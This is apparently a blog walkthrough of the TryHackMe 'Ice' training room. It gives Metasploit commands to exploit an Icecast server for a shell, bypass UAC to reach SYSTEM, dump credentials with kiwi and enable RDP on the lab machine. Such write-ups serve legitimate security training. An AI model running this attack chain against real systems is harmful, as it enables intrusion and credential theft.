Skip to main content

TryHackMe - Ice - Walkthrough

· 2 min read
Bryan Wendt
Bryan Wendt
Security Enthusiast

This is a walkthrough for room: Ice, on TryHackMe. This is an easy walkthrough room. Let’s get started!

We are going to start with an nmap scan:

i1

We can utilize the nmap scan to answer the first 3 questions of the room.

Gain Access

Let’s do some googling and look for the CVE score of the icecast vulnerability. Here is a link to the list of vulnerabilities: Link. Here we find out next two answers.

Start metasploit:

msfconsole
search icecast ##(find next answer)
use 0
options
set rhosts 10.10.35.203
set lhost tun0 ##(if needed)
run

Wow. We got a shell! That was pretty easy. Let’s continue on!

i2

Escalate

We get the first answer right away. Next let’s run the following for more answers:

getuid sysinfo NOTE: Normally, I would back out of this exploit, and change the payload of our meterpreter shell to x64 instead of our current x86 (we always want those to line up), but in this case I am just going to keep going.

run post/multi/recon/local_exploit_suggester
background
use exploit/windows/local/bypassuac_eventvwr
options
set sessions 1 #(Your session could be a different number)
set lhost tun0
set lport 4445 #(We already have a session on 4444)
run
getprivs

We now have elevated permissions! Last answer can be found from the output of the getprivs command.

i3

Looting

Let’s run ps, where we find our next answer:

i4

Now we can migrate to that process with migrate -N <process_name>

NOTE: We can also migrate by using the Process ID (PIC): migrate 692

Now when we run getuid we are: NT AUTHORITY\SYSTEM. WOOHOO!

load kiwi
help
creds_all

With that, we have completed this section! Almost done!

Post-Exploitation

Run help to answer all the questions in this section.

Enable RDP: run post/windows/manage/enable_rdp

Extra Credit

That’s all there is to this room! Try doing the manual exploitation on your own!

Review

This was a really interesting walkthrough room. While it was heavily guided, I liked how it followed the process of how you would do a pentest on the machine in a way that somewhat resembles the real-world. I hope you enjoyed this walkthrough!

References Ice Room | TryHackMe | Icecast Vulns